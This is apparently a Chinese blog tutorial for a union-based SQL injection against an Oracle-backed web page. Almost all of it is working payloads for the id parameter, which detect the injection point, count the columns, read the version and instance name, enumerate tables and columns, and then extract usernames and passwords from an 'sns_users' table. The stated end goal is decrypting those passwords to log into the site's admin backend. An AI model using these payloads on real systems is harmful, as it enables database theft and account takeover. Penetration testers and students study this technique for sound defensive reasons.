步骤⼀:
跟其他数据库⼀样,检测注⼊点都是可以通过拼接and语句进⾏判断。这⾥通过and 1=1
和and 1=2进⾏判断。
?id=1 and 1=1
?id=1 and 1=2
步骤⼆:
通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断
当前字段数为2
?id=1 order by 2?id=1 order by 3
步骤三:获取显错点,联合查询这⾥使⽤了union select,oracle数据库与mysql数据库不同点在于它对 于字段点数据类型敏感,也就是说我们不能直接union select 1,2,3来获取显错点了,需要在字符型字段使⽤字符型数据,整型字段使⽤整型数据才可以
?id=-1 union select null,null from dual
步骤四:查询数据库版本信息
?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual
步骤五:查询当前数据库库名
?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual
步骤六:查询数据库表名,查询表名⼀般查询admin或者user表
获取第⼀个表名LOGMNR_SESSION_EVOLVE$
?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
获取第⼆个表名LOGMNR_GLOBAL$
?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
获取第三个表名LOGMNR_GT_TAB_INCLUDE$
?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual
模糊搜索查询.获取sns_users表名
?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
步骤七:查询数据库列名
模糊搜索查询
?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USE R%') from dual
步骤⼋:查询数据库数据获取账号密码的字段内容
?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'
?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
步骤九:对其数据库内的字段内容进⾏解密....进⾏后台登录
657
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
